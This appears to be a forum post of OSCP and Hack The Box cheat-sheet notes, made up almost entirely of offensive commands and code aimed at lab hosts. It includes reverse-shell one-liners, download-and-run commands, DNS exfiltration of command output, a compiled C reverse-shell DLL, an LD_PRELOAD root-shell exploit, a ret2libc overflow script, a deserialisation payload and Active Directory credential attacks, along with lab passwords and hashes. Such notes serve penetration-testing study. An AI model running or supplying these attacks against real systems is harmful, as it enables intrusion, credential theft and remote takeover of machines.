Good %CURRENT_TIME%. While chasing the OSCP I have been collecting various materials and small notes. I decided to share some of them.
And some more as a bonus:
SMB:
- smbclient -L //10.10.10.100
- smbclient -N \\\\10.10.10.123\\general
- smbmap -H 10.10.10.107 -u alice1978 -p '00000000000000000000000000000000:0B186E661BBDBDCF6047784DE8B9FD8B' --download alice/my_private_key.ppk - download a remote file via pass-the-hash
Code:
sudo apt-get install cifs-utils
mkdir /mnt/Replication
smbmap -R Replication -H <host> -A Groups.xml -q
mount -t cifs //10.10.10.100/Replication /mnt/Replication -o username=,password=,domain=active.htb
grep -R password /mnt/Replication/
gpp-decrypt <pass-gpppolicy>
Kerberoasting:
- ldapsearch -x -h <HOST> -p 389 -D '<USER>' -w '<PASS>' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName
- GetADUsers.py -all active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100
- GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -output tgs-administrator.hash
- psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
- ldapsearch -x -h 10.10.10.100 -p 389 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountName
- GetUserSPNs.py <SPN> -dc-ip <host> -request
- /opt/hashcat/hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --force --potfile-disable
- john --format=krb5tgs hashes.txt --wordlist=/rockyou.txt
- wmiexec.py <SPN>:<password>@host
- curl -s -G [link hidden from guests] --data-urlencode "query={user}" | jq
- curl -s -G [link hidden from guests] --data-urlencode 'query={user {username} }' | jq
- curl -s -G [link hidden from guests] --data-urlencode 'query={user {username, password} }' | jq
- nmap -Pn -sV -sC -p80 --min-rate=300 <host>
- Drupal: /opt/droopescan/droopescan scan drupal -u [link hidden from guests]
- nmap --script safe -p445 10.10.10.100
- ./dirsearch
- sslyze --regular 10.10.10.65
- ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.130 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
- nmap -p$ports -sC -sV -T4 10.10.10.130
- powershell "(new-object System.Net.WebClient).Downloadfile('http://<IP>/writeup.exe', 'writeup.exe')"
- cmd /c sc query state= all type= all | findstr SERVICE_NAME
- enum4linux -u hazard -p stealth1agent -a 10.10.10.149
- nmap --script-help ftp-anon
- nmap -sV --script=nfs-ls 10.10.10.34
- nmap --script ftp-brute scavenger.htb -p21
- nmap --script smtp-enum-users.nse
- nmap --script smtp-commands.nse 10.10.10.155 -p25
- masscan -p1-65535,U:1-65535 10.10.10.98 --rate=1000 -e tun0 > ports
- ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
- nmap -Pn -sV -sC -p$ports 10.10.10.98
- wpscan --url [link hidden from guests] --wordlist /root/Desktop/writeups/apocalyst/list.txt --enumerate [plugin, users, themes]
- find / -perm -4000 2>/dev/null
- ldd /usr/bin/myexe
- ldconfig -v | grep -v "^"$'\t' | sed "s/:$//g"
- cat /etc/ld.so.conf.d/*.conf
- fsutil fsinfo drive
- hashcat -m 7900 admin.hash /usr/share/wordlists/rockyou.txt -o admin.cracked --force
- zip2john BHWS_Backup.zip > hash
- john -w=rockyou.txt hash
- fcrackzip -D -p
- ssh2john id_rsa > span.john
- john span.john
- 7z2john.pl backup.7z > hash
- john --format=7z --wordlist=rockyou.txt hash
- \\10.10.14.14\share\nc64.exe -e cmd.exe 10.10.14.14 443
- wget [link hidden from guests]
- nc -lvnp 8081
- nc64.exe -e cmd 10.10.14.11 8081
- python -c 'import pty; pty.spawn("/bin/sh")'
- rebootuser/LinEnum
- debugfs /dev/sda1
- runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.Webclient).downloadstring('[link hidden from guests]')"
- sudo -l
- linuxprivchecker
- /var/log/auth.log
- cron job
- SUID/SGID
- ps
- netstat -nlp
- Listener
- openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
- openssl s_server -quiet -key key.pem -cert cert.pem -port 73
- openssl s_server -quiet -key key.pem -cert cert.pem -port 136
- Client
- C:\..\openssl.exe s_client -quiet -connect 10.10.14.2:73 | cmd.exe | C:\..\openssl.exe s_client -quiet -connect 10.10.14.2:136
- Client
- FOR /F "tokens=1" %g IN ('whoami') DO (nslookup %g 10.10.14.23)
- FOR /F "tokens=1" %g IN ('dir /b c:\users') DO (nslookup %g 10.10.14.23)
- Listener
- tcpdump -nni tun0 -vv port 53
- exploit/windows/local/bypassuac_eventvwr
- exploit/windows/local/ms10_015_kitrap0d
- ms16_032_secondary_logon_handle_privesc
- SecWiki/windows-kernel-exploits
- wget [link hidden from guests]
- ./openssl base64 -in /etc/shadow | base64 --
- Icacls www
- certutil -urlcache -split -f <host>/file.exe
- mdb-tables backup.mdb | grep --color=auto user
- mdb-export backup.mdb auth_user
- readpst -tea -m Access\ Control.pst
- for host in 1 2 3 4; do for port in 21 22 25 80 443 8080; do echo 172.19.0.$host:$port & openssl s_client -connect 172.19.0.$host:$port 2> /dev/null | grep CONNECTED; done; done
IIS-SHortScanner:
- java -jar /opt/IIS-ShortName-Scanner/iis_shortname_scanner.jar 2 20 [link hidden from guests] /opt/IIS-ShortName-Scanner/config.xml
- ssh -i bastion.key 10.10.10.65 -p 1022 -L :172.24.0.2:80
- ssh -N -L 60080:127.0.0.1:60080 ots-lMmVkNzA@10.10.10.133
- padbuster [link hidden from guests] 2zKLNWhe0Xt7G4ymYDK%2BEdptckP8a8vO 8 -cookies auth=2zKLNWhe0Xt7G4ymYDK%2BEdptckP8a8vO -encoding 0
- padbuster [link hidden from guests] 2zKLNWhe0Xt7G4ymYDK%2BEdptckP8a8vO 8 -cookies auth=2zKLNWhe0Xt7G4ymYDK%2BEdptckP8a8vO -encoding 0 -plaintext user=admin
- Send a request with the header User-Agent: <?php system($_GET['c']); ?>
- Read /var/log/apache2/access.log?c=id via the LFI
- docker run -it -v /:/opt bash bash
- docker run -it -v `pwd`:/root quickbreach/powershell-ntlm
- echo 'ssh-rsa AAAAB3NzaC1yc2[.......................]smp root@host' > /home/zabbix/.ssh/authorized_keys
- echo "mkfifo /tmp/pepe; nc 10.1.0.42 8888 0</tmp/pepe | /bin/sh >/tmp/pepe 2>&1; rm /tmp/pepe" > /tmp/shell.sh
- tar cf www/arc.tar --checkpoint-action=exec=sh shell.sh --checkpoint=1 archive.tar lhennp shell.sh systemd-private-484fa214f76d4a889cc1e7a8563f7881-systemd-timesyncd.service-40OZJe www
- ssh -i /root/.ssh/id_rsa user@ip
- Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.2 -Port 4444
- [link hidden from guests]
- rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1335 >/tmp/f
- nc -e /bin/sh 10.1.0.42 8888
- bash -i >& /dev/tcp/10.0.14.11/1339 0>&1
- echo%20%27%3C%3F%20%24sock%3Dfsockopen%28%2210.10.14.14%22%2C1234%29%3Bexec%28%22%2Fbin%2Fbash%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%20%3F%3E%27%20%3E%20wc.php
<?php $sock=fsockopen("10.10.14.14",1234);exec("/bin/sh -i <&3 >&3 2>&3"); ?>
- certutil.exe -urlcache -split -f [link hidden from guests] c:\users\public\desktop\shortcuts\nc.exe
- cryptsetup luksDump backup.img | grep "Payload offset"
- dd if=backup.img of=header bs=512 count=4097
- hashcat -m 14600 -a 0 -w 3 header rockyou.txt
- java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd /c ping -n 2 10.10.16.32' > payload.bin
Code:
$pass = ConvertTo-SecureString '$sys4ops@megabank!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('alice', $pass)
$session = New-PSSession -ComputerName 10.10.10.132 -Credential $cred -Authentication Negotiate
Enter-PSSession $session
Python web server
- python3 -m http.server 80 - server
- wget 10.10.16.32/rootshell - client
Code:
git clone https://github.com/GreatSCT/GreatSCT
cd GreatSCT/setup
sudo ./setup.sh -c
cd ..
./GreatSCT.py
powershell wget 10.10.16.32/payload.xml -O payload.xml
cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
Hack with SUID:
Suid shell:
Code:
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
/* constructor: runs as soon as the library is loaded via /etc/ld.so.preload */
__attribute__ ((__constructor__))
void dropshell(void)
{
    chown("/tmp/rootshell", 0, 0);    /* make the prepared binary root-owned */
    chmod("/tmp/rootshell", 04755);   /* and setuid root */
    unlink("/etc/ld.so.preload");     /* remove the preload entry again */
    printf("[+] done!\n");
}
Compile:
gcc -fPIC -shared -ldl -o libhax.so file1.c
Rootshell:
Code:
#include <stdio.h>
#include <unistd.h>
int main(void)
{
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    /* execl takes the program path followed by its argv, NULL-terminated */
    execl("/bin/sh", "sh", (char *)NULL);
    return 0;
}
Compile:
gcc root.c -o rootshell
Execute shell:
Code:
cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
Generate cert to ssh:
- openssl genrsa -out client.key 2048
- openssl req -new -key client.key -out client.csr
- openssl x509 -req -in client.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out client.pem -days 1024 -sha256
- openssl pkcs12 -export -out client.pfx -inkey client.key -in client.pem -certfile intermediate.cert.pem
Code:
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define DEFAULT_BUFLEN 1024
void ExecutePayload(void);
/* DLL entry point: the payload runs as soon as the DLL is loaded into the process */
BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
    switch (dwReason)
    {
    case DLL_PROCESS_ATTACH:
        ExecutePayload();
        break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;
}
void ExecutePayload(void) {
    Sleep(1000);
    SOCKET mySocket;
    sockaddr_in addr;
    WSADATA version;
    WSAStartup(MAKEWORD(2,2), &version);
    mySocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr("10.10.16.32");
    addr.sin_port = htons(4443);
    if (WSAConnect(mySocket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL) == SOCKET_ERROR)
    {
        closesocket(mySocket);
        WSACleanup();
    }
    else {
        char RecvData[DEFAULT_BUFLEN];
        memset(RecvData, 0, sizeof(RecvData));
        /* wait for the first message from the listener before spawning the process */
        int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
        if (RecvCode <= 0) {
            closesocket(mySocket);
            WSACleanup();
        }
        else {
            char Process[] = "cmd.exe";
            STARTUPINFO sinfo;
            PROCESS_INFORMATION pinfo;
            memset(&sinfo, 0, sizeof(sinfo));
            sinfo.cb = sizeof(sinfo);
            sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
            /* the socket becomes stdin/stdout/stderr of the child process */
            sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE) mySocket;
            CreateProcess(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
            WaitForSingleObject(pinfo.hProcess, INFINITE);
            CloseHandle(pinfo.hProcess);
            CloseHandle(pinfo.hThread);
            memset(RecvData, 0, sizeof(RecvData));
            RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
            if (RecvCode <= 0) {
                closesocket(mySocket);
                WSACleanup();
            }
            if (strcmp(RecvData, "exit\n") == 0) {
                exit(0);
            }
        }
    }
}
- apt install mingw-w64
- i686-w64-mingw32-g++ pwn.cpp -lws2_32 -o srrstr.dll -shared
- cd C:\Users\Batman\AppData\Local\Microsoft\WindowsApps
- upload srrstr.dll
- cmd /c C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
Code:
$pass = convertto-securestring 'Zx^#QZX+T!123' -asplain -force
$cred = new-object system.management.automation.pscredential('arkham\batman', $pass)
enter-pssession -computer arkham -credential $cred
Wfuzz Cookie:
- wfuzz -c --hw=29 -w /usr/share/SecLists/Passwords/darkweb2017-top1000.txt -H "Cookie: password=FUZZ" [link hidden from guests]
- gcc -shared -fPIC -o libseclogin.so libseclogin.c
- sh ip bgp 10.120.15.0/25
- vtysh
- bgp 100
Code:
{"username":"_$$ND_FUNC$$_require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 1234 >/tmp/f', function(error, stdout, stderr) { console.log(stdout) })","country":"Lameville","city":"Lametown","num":"2"}
Golden Ticket Automate:
- rpcclient -U htb\\james mantis.htb.local
- python ms14-068.py -u james@htb.local -d mantis.htb.local -p J@m3s_P@ssW0rd! -s S-1-5-21-4220043660-4019079961-2895681657
- python goldenPac.py htb.local/james@mantis.htb.local
- samratashok/nishang
- inquisb/icmpsh
- sysctl -w net.ipv4.icmp_echo_ignore_all=1
- wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
- whoami /all > C:\Users\Public\proof.txt
- .\juicypotato.exe -t * -p C:\Users\Destitute\root.bat -l 9001 -c {A9B5F443-FE02-4C19-859D-E9B5C5A1B6C6}
- net user Administrator abc123! -> shell
- psexec.py administrator@10.10.10.11
- pth-winexe -U jeeves/Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd
Find libc address: ldd /usr/local/bin/backup
Find libc system function: readelf -s /lib32/libc.so.6 | grep system
Find libc exit function: readelf -s /lib32/libc.so.6 | grep exit
Find libc /bin/sh reference: strings -a -t x /lib32/libc.so.6 | grep /bin/sh
Example SUID:
Code:
import struct, subprocess
libc = 0xf75e2000             # libc base address (from ldd)
sysOffset = 0x0003a940        # offset of system() (from readelf)
sysAddress = libc + sysOffset
exitOffset = 0x0002e7b0       # offset of exit() (from readelf)
exitAddress = libc + exitOffset
binsh = libc + 0x0015900b     # offset of the "/bin/sh" string (from strings -t x)
payload = b"A" * 512          # padding up to the saved return address
payload += struct.pack("<I", sysAddress)
payload += struct.pack("<I", exitAddress)
payload += struct.pack("<I", binsh)
attempts = 0
while True:
    attempts += 1
    print("Attempts: " + str(attempts))
    subprocess.call(["/usr/local/bin/backup", "-i", "3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110", payload])
Active Directory DACL Attack Chain:
- Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
- Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword -Verbose
- $UserPassword = ConvertTo-SecureString 'Sup3rS3cr3t!' -AsPlainText -Force -Verbose
- Set-DomainUserPassword -Identity claire -AccountPassword $UserPassword -Verbose
- $Cred = New-Object System.Management.Automation.PSCredential('HTB\claire', $UserPassword)
- Add-DomainGroupMember -Identity 'Backup_Admins' -Members 'claire' -Credential $Cred
- Get-ChildItem HKCU:\Software\Microsoft\Windows\CurrentVersion\Lxss | %{Get-ItemProperty $_.PSPath} | out-string -width 4096
- snmpwalk -Os -c public -v 1 10.10.10.20
- quentinhardy/odat
- Upload file: ./odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ writeup.exe writeup.exe
- Execute file: ./odat.py externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ writeup.exe
Code:
patator http_fuzz url=http://10.10.10.108/zabbix/index.php method=POST body='name=zapper&password=FILE0&autologin=1&enter=Sign+in' 0=/usr/share/SecLists/Passwords/darkweb2017-top1000.txt accept_cookie=1 follow=1 -x ignore:fgrep='Login name or password is incorrect.'
LINKS:
- swisskyrepo/PayloadsAllTheThings
- paralax/Awesome-Pentest-1
- yeyintminthuhtut/Awesome-Red-Teaming
- samratashok/nishang